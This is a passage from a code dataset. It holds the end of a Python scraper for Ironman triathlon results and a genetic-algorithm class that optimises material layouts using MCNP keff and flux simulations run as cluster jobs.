\"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20140517&agegroup=30-34&sex=M&y=2014&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20160911&agegroup=30-34&sex=M&y=2016&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20170910&agegroup=30-34&sex=M&y=2017&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20150913&agegroup=30-34&sex=M&y=2015&ps=20#axzz5FMGvgHL2\",\n 
\"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20140907&agegroup=30-34&sex=M&y=2014&ps=20#axzz5FMGvgHL2\"]\n\n\n\n\ndef get_table(url):\n page = urllib2.urlopen(url)\n soup = BeautifulSoup(page, 'lxml') #parse html\n table = soup.find_all('table')[0] #Grab the first table\n return table\n\ndef set_columns(table):\n\n n_columns = 0\n n_rows=0\n column_names = []\n\n # Find the number of rows and columns\n for row in table.find_all('tr'):\n # Determine the number of rows in the table\n td_tags = row.find_all('td')\n if len(td_tags) > 0:\n n_rows+=1\n if n_columns == 0:\n # Set the number of columns for our table\n n_columns = len(td_tags)\n\n # Handle column names if we find them\n th_tags = row.find_all('th')\n if len(th_tags) > 0 and len(column_names) == 0:\n for th in th_tags:\n column_names.append(th.get_text())\n\n # Error checking for Column Names\n if len(column_names) > 0 and len(column_names) != n_columns:\n raise Exception(\"The column titles do not match the number of columns\")\n\n columns = column_names if len(column_names) > 0 else range(0,n_columns)\n df = pd.DataFrame(columns=columns, index= range(0,n_rows))\n\n return df,columns\n\ndef get_row_count(table):\n n_rows=0\n # Find the number of rows and columns\n for row in table.find_all('tr'):\n # Determine the number of rows in the table\n td_tags = row.find_all('td')\n if len(td_tags) > 0:\n n_rows+=1\n return n_rows\n\ndef get_results(df,table):\n row_marker = 0\n for row in table.find_all('tr'):\n #print(row)\n column_marker = 0\n columns = row.find_all('td')\n for column in columns:\n df.iat[row_marker,column_marker] = column.get_text()\n column_marker += 1\n if len(columns) > 0:\n row_marker += 1\n return df\n\ndef merge_df(df1, df2):\n df_new = pd.concat([df1, df2], ignore_index=True)\n return df_new\n\n\n\nif __name__ == '__main__':\n im_start_page = \"http://www.ironman.com/triathlon/events/americas/ironman/world-championship/results.aspx\"\n\n initialize_web_page = im_start_page.format(page_nr=1)\n #initializing a starting table\n init_table = get_table(initialize_web_page)\n #set initial columns names\n init_df,col_names = set_columns(init_table)\n init_df = init_df[init_df.Name.notnull()]\n\n n=0\n while n < len(url_list):\n start_web_page = url_list[n].format(page_nr=1)\n #set initial table to get columns\n table = get_table(start_web_page)\n #set initial columns names\n im_orig_df,col_names = set_columns(table)\n\n #rowcount = get_row_count(table)\n im_orig_df = get_results(im_orig_df,table)\n\n #print(im_orig_df)\n\n for i in range(2,10):\n page_nr = i\n web_page = url_list[n].format(page_nr=page_nr) #get the webpage url with page number\n print(\"Processing {}\".format(web_page)) #print page for debug\n table = get_table(web_page) #get the first table on the webpage\n rowcount = get_row_count(table)\n #(re)initialize dataframe\n im_results_df = pd.DataFrame(index= range(0,rowcount), columns=col_names)\n im_results_df = get_results(im_results_df,table)\n\n im_orig_df = merge_df(im_results_df,im_orig_df)\n n += 1 #used to iterate through the list of webpages\n\n init_df = merge_df(im_orig_df,init_df)\n\n\n\n print(init_df)\n","repo_name":"npwise/IM-web-scrape","sub_path":"im_web_scrape.py","file_name":"im_web_scrape.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9555640560","text":"import os\nimport collections\nimport math\nimport 
random\nimport copy\nimport time\n\n\nimport Individual_v1 as individual\nimport MCNP_File_Handler\n#import CNN_Handler\n\nclass genetic_algorithm:\n def __init__(self, options_dict):\n self.mcnp_file_handler = MCNP_File_Handler.mcnp_file_handler()\n print(\"Initializing GA with:\", options_dict)\n self.options = options_dict\n ### List of current generation individuals\n self.individuals = []\n\n random.seed(self.options['python_random_number_seed'])\n\n self.generation = 0\n self.individual_count = 0\n ### Creating initial population\n for ind in range(self.options['number_of_individuals']):\n self.individuals.append(individual.individual(options_dict, self.generation, self.individual_count))\n self.individual_count += 1\n\n if self.options['remake_duplicate_children'] == True:\n self.all_individuals = copy.deepcopy(self.individuals)\n print(\"All individuals:\", self.all_individuals)\n ### Loading CNN if needed\n #if 'cnn' in self.options['solver']:\n # model_string = \"CNN_3d_11x11_fm_cad_4x4_kern_v2.hdf5\"\n # self.cnn_handler = CNN_Handler.CNN_handler(model_string)\n # self.cnn_input = []\n\n if self.options['include_pattern']:\n print(\"Including a pattern in initial population!\")\n for ind_count, pattern_to_include in enumerate(self.options['pattern_to_include']):\n self.individuals[ind_count].material_matrix = []\n for material in pattern_to_include:\n self.individuals[ind_count].material_matrix.append([material])\n self.individuals[ind_count].make_material_string_scale('%array%1')\n\n if self.options['enforce_material_count']:\n print(\"enforcing material\",self.options['enforce_material_number'],' count:', self.options['enforced_fuel_count_value'])\n for ind_count, ind in enumerate(self.individuals):\n ind.enforce_material_count(self.options['enforce_material_number'], self.options['enforced_fuel_count_value'])\n\n ### Creating output csv if needed\n if self.options['write_output_csv']:\n output_csv = open(self.options['output_filename'] + '.csv', 'w')\n ### Writing out options for this run\n for flag in self.options:\n output_csv.write(\"{},{}\\n\".format(flag, self.options[flag]))\n output_csv.write(\"%%%begin_data%%%\\n\")\n output_csv.write(self.create_header() +\"\\n\")\n output_csv.close()\n\n\n ### Running eigenvalue calcs if needed\n #if self.options['enforced_maximum_eigenvalue'] == True:\n # getattr(self, self.options['check_eigenvalue_function'])()\n\n ### Evaluating initial population, gen 0\n print(\"Evaluating initial population\")\n self.evaluate(self.options['fitness'])\n\n if self.options['use_non_dominated_sorting'] == True:\n self.parents_list = self.non_dominated_sorting()\n else:\n self.individuals.sort(key=lambda x: getattr(x, self.options['fitness_sort_by']), reverse=True)\n ### Pairing down individuals to be specified number\n self.individuals = self.individuals[:self.options['number_of_individuals']]\n\n\n ### Evaluating diversity of population\n if self.options['choose_parent_based_on_bitwise_diversity']:\n print(\"Evaluating diversity of parents\")\n self.evaluate_bitwise_diversity_of_parents()\n\n self.write_output_v2(self.parents_list)\n self.generation += 1\n\n ### Running GA algo\n for generation in range(self.options['number_of_generations']):\n print(\"Generation: \", self.generation)\n print(\"crossover\")\n list_of_children = self.crossover()\n print(\"mutating\")\n list_of_mutated_children = self.mutate(list_of_children)\n\n if self.options['remake_duplicate_children'] == True:\n list_of_mutated_children = 
self.remake_duplicate_children(list_of_mutated_children, self.all_individuals)\n self.all_individuals += list_of_mutated_children\n\n if self.options['enforce_material_count']:\n print(\"enforcing fuel count:\", self.options['enforced_fuel_count_value'])\n for ind_count, ind in enumerate(list_of_mutated_children):\n ind.enforce_material_count(self.options['enforce_material_number'], self.options['enforced_fuel_count_value'])\n\n print(\"evaluating children\")\n self.evaluate(self.options['fitness'], list_of_mutated_children)\n #for ind_count, ind_ in enumerate(list_of_mutated_children):\n # print(ind_count, ind_.ind_count, ind_.generation, ind_.representativity)\n #print(\"CHILDREN:::\")\n #for ind_count, ind_ in enumerate(list_of_mutated_children):\n #print(ind_count, ind_.ind_count, ind_.generation, ind_.representativity)\n\n ### Checking if any of the children have already been created/evaluated\n\n ### combining now evaluated children with previous list of individuals\n self.individuals = self.parents_list + list_of_mutated_children\n\n\n\n\n print(\"All individuals in this generation!\")\n for ind_count, ind_ in enumerate(self.individuals):\n print(ind_count, ind_.ind_count, ind_.generation, ind_.keff, ind_.representativity)\n\n print(\"write output\")\n if self.options['write_output_csv']:\n self.write_output_v2(self.parents_list)\n\n self.generation += 1\n\n if self.options['remake_duplicate_children'] == True:\n self.all_individuals += list_of_mutated_children\n\n #print(\"Printing all individuals!\")\n #for ind_ in self.all_individuals:\n #print(ind_.input_file_string, ind_.representativity)\n\n if self.options['output_all_individuals_at_end_of_calculation'] == True:\n output_csv = open(self.options['output_all_individuals_at_end_of_calculation_file_name'] + '.csv', 'w')\n for flag in self.options:\n output_csv.write(\"{},{}\\n\".format(flag, self.options[flag]))\n output_csv.close()\n print(self.options['output_all_individuals_at_end_of_calculation_file_name'])\n self.write_output_v2(list_of_individuals = self.all_individuals, output_file_name = self.options['output_all_individuals_at_end_of_calculation_file_name'])\n\n\n def apply_constraint(self, list_of_individuals, constraint_type):\n print(\"Applying constraint:\", constraint_type)\n meet_constraint = False\n ### Seperating constraint and options, etc.\n constraint_split = constraint_type.split(\"#\")\n\n constraint_type_ = constraint_split[0]\n constraint_run_location = constraint_split[1]\n constraint_options = constraint_split[2]\n\n if constraint_type_ == 'keff':\n if 'mcnp' in self.options['solver']:\n self.mcnp_keff_inputs = []\n self.mcnp_file_handler = MCNP_File_Handler.mcnp_file_handler()\n for individual in list_of_individuals:\n ### Building MCNP input file\n data_dictionary_ = individual.create_discrete_material_mcnp_dictionary(\n self.options['keywords_list'])\n ### Finding and adding the fuel location to geometry dictionary\n data_dictionary_['kcode_source_x'] = str(individual.find_fuel_location())\n ### Building MCNP input\n self.mcnp_file_handler.write_mcnp_input(\n template_file=self.options['mcnp_keff_template_file_string'],\n dictionary_of_replacements=data_dictionary_,\n input_file_str=individual.keff_input_file_string)\n ### Building MCNP input script for cluster\n self.mcnp_file_handler.build_mcnp_running_script(individual.keff_input_file_string)\n ### Running MCNP input\n self.mcnp_file_handler.run_mcnp_input(individual.keff_input_file_string)\n ### Adding input name to list, used to determine if the 
jobs have completed or not\n self.mcnp_keff_inputs.append(individual.keff_input_file_string)\n\n ### Waits on the jobs to be completed (looking for \"_done.dat\" files)\n self.wait_on_jobs('mcnp_keff')\n\n ### Grabs keff from the output files\n for ind in list_of_individuals:\n if self.options['fake_fitness_debug']:\n ind.keff = random.uniform(0.5, 1.5)\n else:\n ind.keff = self.mcnp_file_handler.get_keff(ind.keff_input_file_string)\n\n ### If that keff is above a set threshold, sets acceptable_eigenvalue to false. Else, sets it True.\n if float(ind.keff) >= self.options['enforced_maximum_eigenvalue']:\n print(\"keff, \", ind.keff, \"too high. Skipping source calculation\")\n ind.acceptable_eigenvalue = False\n else:\n ind.acceptable_eigenvalue = True\n #if 'scale' in self.options['solver']:\n ### create scale inputs, add filenames to list\n #for individual in self.individuals:\n #if individual.evaluated_keff == False:\n #if self.options['geometry'] == 'cyl':\n # individual.make_material_string_scale('cyl_materials')\n #elif self.options['geometry'] == 'grid':\n # individual.make_material_string_scale('%array%1')\n #else:\n # print(\"Geometry not handled in evaluate function\")\n # exit()\n #scale_inputs.append(individual.setup_scale(self.generation))\n #individual.evaluated_keff = True\n #if self.options['fake_fitness_debug']:\n # individual.keff = random.uniform(0.5, 1.5)\n #self.scale_inputs = scale_inputs\n ### submitting all jobs and waiting on all jobs\n #if self.options['solver_location'] == 'necluster':\n # self.submit_jobs(self.scale_inputs)\n # self.wait_on_jobs('scale')\n\n #if self.options['solver_location'] == 'local':\n # print(\"Cant run scale locally... yet... fix this\")\n # exit()\n\n #for individual in self.individuals:\n # individual.get_scale_keff()\n ### If \"default_sort\" in constraint definition, sorting individuals by\n if \"default_sort\" in constraint_type:\n list_of_individuals.sort(key=lambda x: x.keff, reverse=False)\n return list_of_individuals\n\n def non_dominated_sorting(self):\n ###\n front = [[]]\n for individual in self.individuals:\n individual.front_rank = 'none'\n print(\"Nondominated sorting\", individual.input_file_string, individual.keff, individual.representativity)\n ### Initializing lists\n dominated_list = []\n number_of_inds_that_dominate_individual = 0\n #for fitness_ in self.options['fitness']:\n #dominated_list.append([])\n #number_of_inds_that_dominate_individual.append(0)\n\n ### Iterating over all individuals, comparing fitnesses\n for individual_ in self.individuals:\n if individual == individual_:\n continue\n individual_.front_number = 0\n\n if self.check_domination(individual, individual_):\n if individual_ not in dominated_list:\n dominated_list.append(individual_)\n\n elif self.check_domination(individual_, individual):\n number_of_inds_that_dominate_individual += 1\n\n\n individual.dominated_list = dominated_list\n individual.number_of_inds_that_dominate_individual = number_of_inds_that_dominate_individual\n #print(individual.input_file_string, individual.keff, individual.representativity, len(individual.dominated_list), individual.number_of_inds_that_dominate_individual)\n\n #for fitness_index, fitness_ in enumerate(self.options['fitness']):\n if individual.number_of_inds_that_dominate_individual == 0:\n individual.front_rank = 0\n #print(\"Ind is rank one:\", individual.input_file_string, individual.representativity, individual.keff)\n front[0].append(individual)\n ### Front counter\n\n\n pareto_front = 0\n while 
front[pareto_front] != []:\n current_front = []\n for individual in front[pareto_front]:\n #print(individual.input_file_string, \"dominates:\")\n for individual_ in individual.dominated_list:\n if individual_.input_file_string == individual.input_file_string:\n continue\n #print(individual_.input_file_string, individual_.number_of_inds_that_dominate_individual)\n individual_.number_of_inds_that_dominate_individual -= 1\n #print(individual_.input_file_string, individual_.number_of_inds_that_dominate_individual)\n if individual_.number_of_inds_that_dominate_individual == 0:\n\n if individual_.front_rank == 'none':\n individual_.front_rank = pareto_front + 1\n current_front.append(individual_)\n #print(individual_.input_file_string, individual_.front_rank, current_front)\n\n front.append(current_front)\n pareto_front += 1\n #print(\"Pareto fronts:\")\n #for front_count, front_list in enumerate(front):\n #print(front_list)\n #for ind in front_list:\n #print(front_count, ind.representativity, ind.keff)\n self.pareto_front = front\n\n #for individual_ in self.individuals:\n #print(individual_.input_file_string, individual_.representativity, individual_.keff)\n\n\n ### Building list of parents\n parents_list = []\n for front in self.pareto_front:\n if front == []:\n continue\n #print(\"Front:\", len(front))\n if len(front) < (self.options['number_of_parents'] - len(parents_list)):\n #print(\"Length of parent list!!!\", len(parents_list))\n parents_list = parents_list + front\n #print(\"Length of parent list!!!\", len(parents_list))\n else:\n\n front = self.crowding_distance(front)\n #print(len(front), self.options['number_of_parents'], len(parents_list))\n front.sort(key=lambda x: x.crowding_distance, reverse=True)\n\n ind_count = 0\n #print(\"Adding parents to parents list\")\n while self.options['number_of_parents'] != len(parents_list):\n parents_list.append(front[ind_count])\n ind_count += 1\n #print(\"parent_list len, etc\", len(parents_list), self.options['number_of_parents'])\n #for parent in parents_list:\n #print(parent.input_file_string, parent.keff, parent.representativity, parent.crowding_distance)\n return parents_list\n\n def crowding_distance(self, front):\n if front == []:\n return\n\n for ind in front:\n ind.crowding_distance = 0.0\n\n for fitness in self.options['fitness']:\n #print(\"fitness\",fitness)\n if len(front) == 0:\n continue\n if \"#\" in fitness:\n fitness = fitness.split(\"#\")\n fitness = fitness[0]\n ### Setting highest and lowest ind's to have large crowding distance\n front.sort(key=lambda x: getattr(x, fitness), reverse=True)\n front[0].crowding_distance = 99999999999999999.0\n front[-1].crowding_distance = 99999999999999999.0\n max_value = float(getattr(front[0],fitness))\n min_value = float(getattr(front[-1], fitness))\n diff_max_min = max_value - min_value\n ### Adding crowding distance for this fitness\n for count, ind in enumerate(front):\n\n if count == 0:\n continue\n if count == (len(front) - 1):\n continue\n\n ind_n_plus_one = float(getattr(front[count-1],fitness))\n ind_n_minus_one = float(getattr(front[count+1],fitness))\n try:\n ind.crowding_distance = ind.crowding_distance + (ind_n_plus_one - ind_n_minus_one)/(diff_max_min)\n except:\n continue\n #print(\"CROWDING DISTANCE!!!\", ind.crowding_distance, count, len(front))\n\n return front\n\n### Checks if ind_1 dominates ind_2\n def check_domination(self, ind_1, ind_2):\n for fit_count, fitness_ in enumerate(self.options['fitness']):\n if \"#\" in fitness_:\n fitness_ = fitness_.split(\"#\")\n 
fitness_ = fitness_[0]\n\n ind_value = getattr(ind_1, fitness_)\n comparison_value = getattr(ind_2, fitness_)\n\n if float(ind_value) >= float(comparison_value):\n continue\n else:\n return False\n\n return True\n\n def remake_duplicate_children(self, list_of_children, comparison_list):\n\n for child in list_of_children:\n #print(\"Checking child:\", child.material_matrix, comparison_list)\n for comparison_ind in comparison_list:\n #print(\"comparison\", child.material_matrix, comparison_ind.material_matrix)\n comparison_score = 0\n for child_mat, comp_mat in zip(child.material_matrix, comparison_ind.material_matrix):\n if child_mat == comp_mat:\n comparison_score += 1\n if comparison_score == self.options['total_materials']:\n #print(\"Duplicate child found! Forcing mutation\")\n #print(\"Before\", child.material_matrix)\n child.material_matrix = self.single_bit_mutation(child.material_matrix, force_mutation=True, force_mutation_per_material_sublist=2)\n #print(\"After\", child.material_matrix)\n #print(child.material_matrix, comparison_ind.material_matrix)\n #if child.material_matrix == comparison_ind.material_matrix:\n # child.create_random_pattern()\n return list_of_children\n\n def evaluate_bitwise_diversity_of_parents(self):\n\n temp_material_master_list = []\n for individual_count, individual in enumerate(self.individuals):\n if individual_count > self.options['number_of_parents'] - 1:\n individual.total_diversity_score = \"N/A\"\n continue\n\n individual.bitwise_diversity_scores = []\n ### cycling over parents evaluating the diversity, if a score of [total number of material locations] is given\n ### if the individuals are exactly the same, 0 exactly opposite\n\n for comparison_count, comparison_individual in enumerate(self.individuals):\n if comparison_count == individual_count:\n continue\n if comparison_count > self.options['number_of_parents'] - 1:\n continue\n individual.bitwise_diversity_scores.append([comparison_count,\n self.evaluate_bitwise_diversity(individual,\n comparison_individual)])\n\n ### Calculating total diversity score\n # print(\"Calculating total diversity score\")\n total_diversity_score = 0\n for d_s in individual.bitwise_diversity_scores:\n # print(d_s[1])\n total_diversity_score += d_s[1]\n\n individual.total_diversity_score = total_diversity_score\n # print(individual.total_diversity_score)\n\n def evaluate_bitwise_diversity(self, individual, comparison_individual):\n score = self.options['total_materials']\n for material_list_count, material_list in enumerate(individual.material_matrix):\n for material_count, material in enumerate(material_list):\n individual_material = individual.material_matrix[material_list_count][material_count]\n comparison_material = comparison_individual.material_matrix[material_list_count][material_count]\n\n if individual_material == comparison_material:\n score -= 1\n return score\n\n def choose_parent_based_on_bitwise_diversity(self, parent_1_value):\n diversity_scores = self.individuals[parent_1_value].bitwise_diversity_scores\n\n ### Sorting diversity scores\n diversity_scores.sort(key=lambda x: x[1], reverse=True)\n\n ### Setting the parent_2 default value to the most similar case\n parent_2_index = diversity_scores[self.options['number_of_parents'] - 2][0]\n\n for d_s in diversity_scores:\n random_value = random.uniform(0, 1)\n\n try:\n if random_value < (d_s[1] / self.individuals[parent_1_value].total_diversity_score):\n parent_2_index = d_s[0]\n except:\n parent_2_index = d_s[0]\n return parent_2_index\n\n\n return 
parent_2_index\n\n def evaluate(self, evaluation_types, list_of_individuals = \"Default\"):\n if list_of_individuals == \"Default\":\n list_of_individuals = self.individuals\n\n ### Updating list of individuals based on whether they meet the constraints in the constraint options\n for constraint in self.options['constraint']:\n if 'evaluate' in constraint:\n list_of_individuals = self.apply_constraint(list_of_individuals, constraint)\n\n for evaluation_type in evaluation_types:\n if \"#\" in evaluation_type:\n evaluation_type, evaluation_options = evaluation_type.split(\"#\")\n scale_inputs = []\n if evaluation_type == 'representativity':\n print(\"Evaluating Representativity\")\n if 'mcnp' in self.options['solver']:\n self.mcnp_inputs = []\n for individual in list_of_individuals:\n if individual.ran_source_calculation == False:\n if individual.acceptable_eigenvalue == True:\n ### Building MCNP input file\n self.build_mcnp_source_input(individual)\n individual.ran_source_calculations = True\n self.wait_on_jobs('mcnp')\n\n for individual in list_of_individuals:\n if self.options['fake_fitness_debug'] == True:\n individual.representativity = random.uniform(0, 1.0)\n individual.total_flux = random.uniform(0, 1.0)\n else:\n if individual.acceptable_eigenvalue == True:\n individual.flux_values, individual.flux_uncertainty, individual.total_flux, individual.total_flux_unc = self.mcnp_file_handler.get_flux(individual.input_file_string + \"o\")\n individual.representativity = self.mcnp_file_handler.calculate_representativity(individual.flux_values, individual.flux_uncertainty)\n if individual.acceptable_eigenvalue == False:\n individual.representativity = 0.0\n individual.total_flux = 0.0\n\n print(\"individual.representativity\", individual.representativity)\n\n\n\n #if 'cnn' in self.options['solver']:\n # print(\"solving for k with cnn\")\n # self.create_cnn_input()\n # self.solve_for_keff_with_cnn()\n return list_of_individuals\n #def create_cnn_input(self):\n # data_array = self.cnn_handler.build_individuals_array(self.individuals, generation=self.generation)\n\n # self.cnn_input = self.cnn_handler.build_input_data_reshaped(data_array,\n # X_val=11,\n # Y_val=11,\n # Z_val=1,\n # channels=2)\n # print(\"HERE!!! 
create_cnn_input\")\n\n #def solve_for_keff_with_cnn(self):\n # self.cnn_predictions = self.cnn_handler.model.predict(self.cnn_input)\n # # print(\"PREDICTIONSSSSS\", self.cnn_predictions, len(self.cnn_input))\n # for pred_count, prediction in enumerate(self.cnn_predictions):\n # # print(\"PREDICTION\", prediction)\n\n # self.individuals[pred_count].keff = prediction[0]\n\n ### The crossover function creates total population - number of parents\n def crossover(self):\n\n if self.options['use_non_dominated_sorting'] == True:\n self.parents_list = self.non_dominated_sorting()\n else:\n self.individuals.sort(key=lambda x: getattr(x, self.options['fitness_sort_by']), reverse=True)\n ### Pairing down individuals to be specified number\n self.individuals = self.individuals[:self.options['number_of_individuals']]\n self.parents_list = self.individuals[:10]\n\n ### Evaluating diversity of population\n if self.options['choose_parent_based_on_bitwise_diversity']:\n #print(\"Evaluating diversity of parents\")\n self.evaluate_bitwise_diversity_of_parents()\n\n number_of_children = self.options['number_of_individuals'] - \\\n self.options['number_of_parents']\n list_of_children = []\n for new_child_value in range(number_of_children):\n ### Getting parent values\n parent_1 = random.randint(0, self.options['number_of_parents'] - 1)\n parent_2 = random.randint(0, self.options['number_of_parents'] - 1)\n while parent_1 == parent_2:\n parent_2 = random.randint(0, self.options['number_of_parents'] - 1)\n\n if self.options['choose_parent_based_on_bitwise_diversity']:\n # print(\"Choosing parent 2 based on diversity score\")\n parent_2 = self.choose_parent_based_on_bitwise_diversity(parent_1)\n\n parent_1 = self.parents_list[parent_1]\n parent_2 = self.parents_list[parent_2]\n if self.options['crossover_type'] == 'bitwise':\n new_child_ind = self.bitwise_crossover(parent_1, parent_2)\n\n ### Checking if new child meets fuel # requirement\n if self.options['verify_fuel_mass_after_crossover']:\n fuel_count = new_child_ind.count_material(1)\n while ((fuel_count > self.options['maximum_fuel_elements']) or (\n fuel_count < self.options['minimum_fuel_elements'])):\n new_child_ind = self.bitwise_crossover(parent_1, parent_2)\n fuel_count = new_child_ind.count_material(1)\n\n if self.options['crossover_type'] == 'singlepoint':\n new_child_ind = self.singlepoint_crossover(parent_1, parent_2)\n if self.options['verify_fuel_mass_after_crossover']:\n ### Checking if new child meets fuel # requirement\n fuel_count = new_child_ind.count_material(1)\n while ((fuel_count > self.options['maximum_fuel_elements']) or (\n fuel_count < self.options['minimum_fuel_elements'])):\n new_child_ind = self.singlepoint_crossover(parent_1, parent_2)\n fuel_count = new_child_ind.count_material(1)\n\n try:\n new_child_ind.parent_string = parent_1.scale_input_filename + \",\" + parent_2.scale_input_filename\n except:\n new_child_ind.parent_string = str(parent_1.ind_count) + \",\" + str(parent_2.ind_count)\n\n new_child_ind.born_from_crossover = True\n\n list_of_children.append(new_child_ind)\n\n return list_of_children\n\n def build_mcnp_source_input(self, individual_):\n ### Building MCNP input file\n self.mcnp_file_handler.write_mcnp_input(template_file=self.options['mcnp_template_file_string'],\n dictionary_of_replacements=individual_.create_discrete_material_mcnp_dictionary(\n self.options['keywords_list']),\n input_file_str=individual_.input_file_string)\n self.mcnp_file_handler.build_mcnp_running_script(individual_.input_file_string)\n\n 
self.mcnp_file_handler.run_mcnp_input(individual_.input_file_string)\n self.mcnp_inputs.append(individual_.input_file_string)\n return\n\n def bitwise_crossover(self, parent_1, parent_2):\n child_ind = individual.individual(self.options, self.generation, self.individual_count)\n self.individual_count += 1\n # print(\"parent 1 pattern:\", parent_1.material_matrix)\n # print(\"parent 2 pattern:\", parent_2.material_matrix)\n # print(\"Child pattern before:\", child_ind.material_matrix, child_ind.ind_count)\n temp_material_master_list = []\n for material_list_count, material_list in enumerate(parent_1.material_matrix):\n temp_material_list = []\n for material_count, material in enumerate(material_list):\n selection = random.randint(0, 1)\n\n material = parent_1.material_matrix[material_list_count][material_count]\n\n if selection == 1:\n material = parent_2.material_matrix[material_list_count][material_count]\n\n temp_material_list.append(material)\n temp_material_master_list.append(temp_material_list)\n child_ind.material_matrix = temp_material_master_list\n # print(\"Child pattern after:\", child_ind.material_matrix)\n return child_ind\n\n def singlepoint_crossover(self, parent_1, parent_2):\n child_ind = individual.individual(self.options, self.generation)\n\n temp_material_master_list = []\n for material_list_count, material_list in enumerate(child_ind.material_matrix):\n temp_material_list = []\n\n ml_length = len(material_list) - 1\n\n singlepoint_value = random.randint(1, ml_length)\n\n temp_material_list = parent_1.material_matrix[material_list_count][0:singlepoint_value] + \\\n parent_2.material_matrix[material_list_count][singlepoint_value - 1:ml_length]\n\n temp_material_master_list.append(temp_material_list)\n child_ind.material_matrix = temp_material_master_list\n\n return child_ind\n\n def mutate(self, list_of_individuals):\n ### Currently only works on a material-basis\n #print(\"MUTATING!!!\")\n if self.options['mutation_type'] == 'bitwise':\n #print(\"BITWISE!\", len(list_of_individuals))\n for ind_count, individual in enumerate(list_of_individuals):\n #print(\"MUTATING:\", ind_count)\n original_material_matrix = copy.deepcopy(individual.material_matrix)\n individual.material_matrix = self.single_bit_mutation(original_material_matrix)\n\n if self.options['verify_fuel_mass_after_mutation']:\n ### Checking if new child meets fuel # requirement\n fuel_count = individual.count_material(1)\n # try_count = 0\n while ((fuel_count > self.options['maximum_fuel_elements']) or (\n fuel_count < self.options['minimum_fuel_elements'])):\n individual.material_matrix = self.single_bit_mutation(original_material_matrix)\n fuel_count = individual.count_material(1)\n # print(\"mutation fuel count:\", fuel_count)\n # try_count += 1\n # print(\"fixed mutation in:\", try_count, \"tries\")\n\n return list_of_individuals\n\n def single_bit_mutation(self, material_matrix, force_mutation = False, force_mutation_per_material_sublist = 1):\n new_material_matrix = []\n #print(\"old material matrix:\", material_matrix)\n ### If forcing a certain number of mutations per material sublist:\n force_mutation_index = []\n if force_mutation:\n for _ in range(force_mutation_per_material_sublist):\n rand_val = random.randint(0, len(material_matrix) - 1)\n while rand_val in force_mutation_index:\n rand_val = random.randint(0, len(material_matrix) - 1)\n #print(rand_val, force_mutation_index)\n force_mutation_index.append(rand_val)\n #print(\"FORCING A MUTATION! 
at index(es):\", force_mutation_index)\n\n for material_list in material_matrix:\n material_matrix_sublist = []\n\n\n\n for material_count, material in enumerate(material_list):\n ### Attempting mutation\n random_val = random.uniform(0, 1.0)\n\n ### If the current material count is in the force mutation list, forcing the mutation\n if force_mutation:\n if material_count in force_mutation_index:\n random_val = self.options['mutation_rate']\n #print(\"Forcing a mutation in material:\", material_count)\n\n\n if random_val <= self.options['mutation_rate']:\n\n new_index = random.randint(0, len(self.options['material_types']) - 1)\n while material == self.options['material_types'][new_index]:\n new_index = random.randint(0, len(self.options['material_types']) - 1)\n # print(\"NEW_INDEX: \", new_index, len(self.options['material_types']) - 1)\n # print(\"new material: \", self.options['material_types'][new_index], \"old\", material)\n material = self.options['material_types'][new_index]\n material_matrix_sublist.append(material)\n new_material_matrix.append(material_matrix_sublist)\n print(\"new_material_matrix:\", new_material_matrix)\n\n return new_material_matrix\n\n def submit_jobs(self, job_list):\n for job in job_list:\n print(\"Submitting job:\", job)\n os.system('qsub ' + job)\n\n def wait_on_jobs(self, run_type, unique_flag = \"\"):\n waiting_on_jobs = True\n jobs_completed = 0\n total_time = 0\n jobs_to_be_waited_on = getattr(self, run_type + \"_inputs\")\n temp_file_list = copy.deepcopy(jobs_to_be_waited_on)\n print(\"Jobs waiting on: \", jobs_to_be_waited_on)\n while waiting_on_jobs:\n for file in os.listdir():\n if \"gen_\" + str(self.generation) in file:\n if \"_done.dat\" in file:\n if unique_flag in file:\n file_temp = file.split(\"_done.dat\")\n script_str = file_temp[0]\n if script_str in temp_file_list:\n temp_file_list.remove(file_temp[0])\n jobs_completed += 1\n if jobs_completed == len(jobs_to_be_waited_on):\n print(\"All jobs are complete, continuing\")\n return\n\n print(\"Jobs Complete: \", jobs_completed, \"Jobs pending:\", len(jobs_to_be_waited_on) - jobs_completed)\n for file in temp_file_list:\n print(file)\n if self.options['skip_waiting_on_jobs_debug']:\n print(\"\"\"options['skip_waiting_on_jobs_debug'] is True, continuing\"\"\")\n return\n print(\"Waiting 15 seconds. 
Total time (mins):\", str(total_time/60))\n time.sleep(15)\n total_time += 15\n\n def enforce_fuel_count(self):\n for individual in self.individuals:\n fuel_count = individual.count_material(1)\n if fuel_count != self.options['enforced_fuel_count_value']:\n individual.fix_material_count(1, self.options['enforced_fuel_count_value'])\n\n def write_output(self):\n output_file = open(self.options['output_filename'] + '.csv', 'a')\n\n ###Building string to write\n number_of_children_needed = self.options['number_of_individuals'] - self.options['number_of_parents']\n number_of_inds_from_current_generation = 0\n for ind_count, individual in enumerate(self.individuals):\n if ind_count <= self.options['number_of_parents'] - 1:\n write_string = self.write_options_funct(output_file, individual)\n output_file.write(write_string + \"\\n\")\n if individual.generation == self.generation:\n number_of_inds_from_current_generation += 1\n\n continue\n if individual.generation == self.generation:\n write_string = self.write_options_funct(output_file, individual)\n output_file.write(write_string + \"\\n\")\n if individual.generation == self.generation:\n number_of_inds_from_current_generation += 1\n continue\n\n if ind_count < self.options['number_of_individuals'] - 1:\n if number_of_children_needed > number_of_inds_from_current_generation:\n continue\n write_string = self.write_options_funct(output_file, individual)\n output_file.write(write_string + \"\\n\")\n continue\n output_file.close()\n\n def write_output_v2(self, list_of_individuals, output_file_name = \"\"):\n\n ### Setting the default value, for the by-generation output\n if output_file_name == \"\":\n output_file_name = self.options['output_filename'] + '.csv'\n\n if output_file_name.endswith('.csv') != True:\n output_file_name += \".csv\"\n\n\n output_file = open(output_file_name, 'a')\n\n ###Building string to write\n for ind_count, 